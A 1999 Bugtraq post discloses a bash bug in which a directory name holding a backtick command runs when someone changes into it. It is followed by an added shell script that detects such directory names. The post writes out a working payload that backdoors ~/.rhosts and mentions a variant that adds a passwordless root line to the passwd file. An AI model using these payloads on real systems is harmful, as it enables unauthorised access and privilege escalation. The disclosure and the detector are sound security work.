Bugtraq mailing list archives
Bash Bug
From: shadow () OPERATOR ORG (Shadow)
Date: Tue, 20 Apr 1999 21:25:47 -0400
Figured while everyone was working with bash, I might as well make this one public (I apologize if this is old news, apparently it hasn't been fixed if so). If a user creates a directory with a command like

    mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "

and someone cd's into said directory, either by accident, or whatever, then it will cause it to actually execute. I also did this with a passwd file, echo a user such as r00t::0:0:\57root\57bin\57bash instead of + + to the rhosts.

Played with symlinks and a few other ways to see if perhaps maybe the system could trip it if a user made the directory in say /tmp. Granted it may be a long shot on the user's part, the ability to do so is a bad thing IMHO. This didn't seem to work on any of my BSD boxes.

shadow - CLE
-------------------------------------------------------------------------
Most Failure is due to giving up, not realizing how close to success you were - Thomas Edison
-------------------------------------------------------------------------
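A defender-side check for the condition described in the post above, as an added example that is not part of the original message: a POSIX shell function that lists directories whose names contain command-substitution syntax or control characters, so shared locations such as /tmp can be audited. The function name `suspicious_dirs` and the choice of patterns are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the original post): report directories whose
# names carry shell command-substitution syntax or control characters.

# suspicious_dirs ROOT
#   Walks ROOT (staying on one filesystem) and prints one line per
#   directory whose name contains a backtick, the sequence "$(", or any
#   control character such as a newline or escape.
#   Every non-printable byte in the reported path is replaced by '?',
#   so the report is safe to view in a terminal and stays one line per hit.
suspicious_dirs() {
    root=$1
    find "$root" -xdev -type d \( \
            -name '*`*' -o \
            -name '*$(*' -o \
            -name '*[[:cntrl:]]*' \
        \) -exec sh -c '
            for d do
                # The path is only ever passed as data to printf/tr;
                # it is never evaluated or re-parsed by a shell.
                printf "%s" "$d" | LC_ALL=C tr -c "[:print:]" "?"
                printf "\n"
            done
        ' sh {} +
}

# Typical use when run as a script: audit world-writable locations.
# (Only runs when a directory argument is supplied.)
if [ "$#" -gt 0 ]; then
    for dir in "$@"; do
        suspicious_dirs "$dir"
    done
fi
```

The function only reads directory names and never changes into the directories it inspects.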